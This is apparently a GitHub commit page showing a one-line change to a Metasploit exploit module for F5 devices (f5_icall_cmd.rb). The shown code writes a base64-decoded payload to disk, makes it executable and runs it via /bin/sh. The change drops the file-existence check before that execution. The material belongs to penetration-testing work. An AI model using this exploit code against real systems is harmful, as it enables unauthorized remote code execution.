We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 109a733 commit c0d9c65Copy full SHA for c0d9c65
modules/exploits/linux/http/f5_icall_cmd.rb
@@ -211,7 +211,7 @@ def check
211
def exploit
212
# phase 1: create iCall script to create file with payload, execute it and remove it.
213
shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
214
- cmd = %(if { ! [file exists #{@payload_path}]} { exec /bin/sh -c "#{shell_cmd}"})
+ cmd = %(exec /bin/sh -c "#{shell_cmd}")
215
216
arg_max = datastore['ARG_MAX']
217
if shell_cmd.size > arg_max
0 commit comments